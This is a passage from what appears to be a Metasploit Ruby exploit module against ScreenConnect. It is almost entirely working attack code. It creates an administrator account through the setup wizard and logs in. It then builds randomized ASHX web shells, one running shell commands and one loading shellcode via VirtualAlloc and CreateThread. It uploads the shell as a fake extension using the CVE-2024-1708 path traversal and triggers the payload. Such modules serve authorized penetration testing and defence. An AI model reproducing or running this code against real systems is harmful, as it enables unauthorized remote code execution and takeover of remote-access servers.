'__VIEWSTATEGENERATOR' => viewstategen,        'ctl00$Main$wizard$userNameBox' => datastore['USERNAME'],        'ctl00$Main$wizard$emailBox' => Faker::Internet.email(name: datastore['USERNAME']).to_s,        'ctl00$Main$wizard$passwordBox' => datastore['PASSWORD'],        'ctl00$Main$wizard$verifyPasswordBox' => datastore['PASSWORD'],        'ctl00$Main$wizard$StepNavigationTemplateContainerID$StepNextButton' => 'Next'      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply from create account step in setup wizard.')    end    print_status("Created account: #{datastore['USERNAME']}:#{datastore['PASSWORD']} (Note: This account will not be deleted by the module)")    #    # 4. Log in with this account to get an authenticated HTTP session.    #    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'Administration'),      'keep_cookies' => true,      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to login with admin credentials.')    end    if res.body =~ %r{"antiForgeryToken"\s*:\s*"([a-zA-Z0-9+/=]+)"}      anti_forgery_token = Regexp.last_match(1)    else      # The antiForgeryToken is not present in older versions of ScreenConnect (Tested with 20.3.31734).      print_warning('Could not locate anti forgery token after login with admin credentials.')      anti_forgery_token = ''    end    #    # 5. Create an extension to host the payload.    #    # NOTE: Rex::Text.rand_guid return a GUID string wrapped in curly braces which is not what we want, so we use    # Faker::Internet.uuid instead.    plugin_guid = Faker::Internet.uuid    payload_ashx = "#{Rex::Text.rand_text_alpha_lower(8)}.ashx"    # According to Microsoft (https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/keywords/) these are    # the list of valid C# keywords, we create a Rex::RandomIdentifier::Generator to generate new identifiera for    # use in the ASHX payload, and pass the list of valid C# keywords as a forbidden list so we dont accidentaly    # generate a valid keyword.    vars = Rex::RandomIdentifier::Generator.new({      forbidden: %w[        abstract add alias and args as ascending async await        base bool break by byte case catch char checked class const continue decimal default delegate descending do        double dynamic else enum equals event explicit extern false file finally fixed float for foreach from get        global goto group if implicit in init int interface internal into is join let lock long managed nameof        namespace new nint not notnull nuint null object on operator or orderby out override params partial private        protected public readonly record ref remove required return sbyte scoped sealed select set short sizeof        stackalloc static string struct switch this throw true try typeof uint ulong unchecked unmanaged unsafe ushort        using value var virtual void volatile when where while with yield      ]    })    if target['Arch'] == ARCH_CMD      payload_data = %(<% @ WebHandler Language="C#" Class="#{vars[:var_handler_class]}" %>using System;using System.Web;using System.Diagnostics;public class #{vars[:var_handler_class]} : IHttpHandler{  public void ProcessRequest(HttpContext #{vars[:var_ctx]})  {    if (String.IsNullOrEmpty(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"])) {      return;    }    byte[] #{vars[:var_bytearray]} = Convert.FromBase64String(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"]);    string #{vars[:var_payload]} = System.Text.Encoding.UTF8.GetString(#{vars[:var_bytearray]});    ProcessStartInfo #{vars[:var_psi]} = new ProcessStartInfo();    #{vars[:var_psi]}.FileName = "#{target['Platform'] == 'win' ? 'cmd.exe' : '/bin/sh'}";    #{vars[:var_psi]}.Arguments = "#{target['Platform'] == 'win' ? '/c' : '-c'} \\\"" + #{vars[:var_payload]} + "\\\"";    #{vars[:var_psi]}.RedirectStandardOutput = true;    #{vars[:var_psi]}.UseShellExecute = false;    Process.Start(#{vars[:var_psi]});  }  public bool IsReusable { get { return true; } }})    else      payload_data = %(<% @ WebHandler Language="C#" Class="#{vars[:var_handler_class]}" %>using System;using System.Web;using System.Diagnostics;using System.Runtime.InteropServices;public class #{vars[:var_handler_class]} : IHttpHandler{  [System.Runtime.InteropServices.DllImport("kernel32")]  private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UIntPtr size, Int32 flAllocationType, IntPtr flProtect);  [System.Runtime.InteropServices.DllImport("kernel32")]  private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UIntPtr dwStackSize, IntPtr lpStartAddress, IntPtr param, Int32 dwCreationFlags, ref IntPtr lpThreadId);  public void ProcessRequest(HttpContext #{vars[:var_ctx]})  {    if (String.IsNullOrEmpty(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"])) {      return;    }    byte[] #{vars[:var_bytearray]} = Convert.FromBase64String(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"]);    IntPtr #{vars[:var_func_addr]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{vars[:var_bytearray]}.Length, 0x3000, (IntPtr)0x40);    Marshal.Copy(#{vars[:var_bytearray]}, 0, #{vars[:var_func_addr]}, #{vars[:var_bytearray]}.Length);    IntPtr #{vars[:var_thread_id]} = IntPtr.Zero;    CreateThread(IntPtr.Zero, UIntPtr.Zero, #{vars[:var_func_addr]}, IntPtr.Zero, 0, ref #{vars[:var_thread_id]});  }  public bool IsReusable { get { return true; } }})    end    manifest_data = %(<?xml version="1.0" encoding="utf-8"?><ExtensionManifest>  <Version>#{Faker::App.version}</Version>  <Name>#{Faker::App.name}</Name>  <Author>#{Faker::Name.name}</Author>  <ShortDescription>#{Faker::Lorem.sentence}</ShortDescription>  <Components>    <WebServiceReference SourceFile="#{payload_ashx}"/>  </Components></ExtensionManifest>)    zip_resources = Rex::Zip::Archive.new    zip_resources.add_file("#{plugin_guid}/Manifest.xml", manifest_data)    # We can leverage CVE-2024-1708 to write one level below the extension directory. This enable Linux targets to work.    zip_resources.add_file("#{plugin_guid}/../#{payload_ashx}", payload_data)    #    # 6. Upload the payload extension.    #    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'Services', 'ExtensionService.ashx', 'InstallExtension'),      'keep_cookies' => true,      'ctype' => 'application/json',      'data' => "[\"#{Base64.strict_encode64(zip_resources.pack)}\"]",      'headers' => {        'X-Anti-Forgery-Token' => anti_forgery_token      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to install extension.')    end    print_status("Uploaded Extension: #{plugin_guid}")    if target['Platform'] == 'win'      # On Windows the current working directory is C:\Windows\System32\ and we dont leak out the install path      # so we use the default installation location...      register_files_for_cleanup("C:\\Program Files (x86)\\ScreenConnect\\App_Extensions\\#{payload_ashx}")    else      # For Linux the current working is the install path (/opt/screenconnect) so we can use a relative path...      register_files_for_cleanup("App_Extensions/#{payload_ashx}")    end    begin      #      # 7. Trigger the payload by requesting the extensions .ashx file.      #      if target['Arch'] == ARCH_CMD        payload_data = payload.encoded.gsub('\\', '\\\\\\\\')      else        payload_data = payload.encoded      end      res = send_request_cgi(        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'App_Extensions', payload_ashx),        'keep_cookies' => true,        'vars_post' => {          vars[:var_payload_key] => Base64.strict_encode64(payload_data)        }      )      unless res&.code == 200        fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to trigger payload.')      end    ensure      #      # 8. Ensure we remove the extension when we are done.      #      print_status("Removing Extension: #{plugin_guid}")      res = send_request_cgi(        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'Services', 'ExtensionService.ashx', 'UninstallExtension'),        'keep_cookies' => true,        'ctype' => 'application/json',        'data' => "[\"#{plugin_guid}\"]",        'headers' => {          'X-Anti-Forgery-Token' => anti_forgery_token        }      )      unless res&.code == 200        print_warning('Failed to remove the extension.')      end    end  end  def get_viewstate(res)    vs_input = res.get_html_document.at('input[name="__VIEWSTATE"]')    unless vs_input&.key? 'value'      print_error('Did not locate the __VIEWSTATE.')      return nil    end    vsgen_input = res.get_html_document.at('input[name="__VIEWSTATEGENERATOR"]')    unless vsgen_input&.key? 'value'      # The __VIEWSTATEGENERATOR is not present in older versions of ScreenConnect (Tested with 20.3.31734).      print_warning('Did not locate the __VIEWSTATEGENERATOR.')      return [vs_input['value'], '']    end    [vs_input['value'], vsgen_input['value']]  endend

Tag

#auth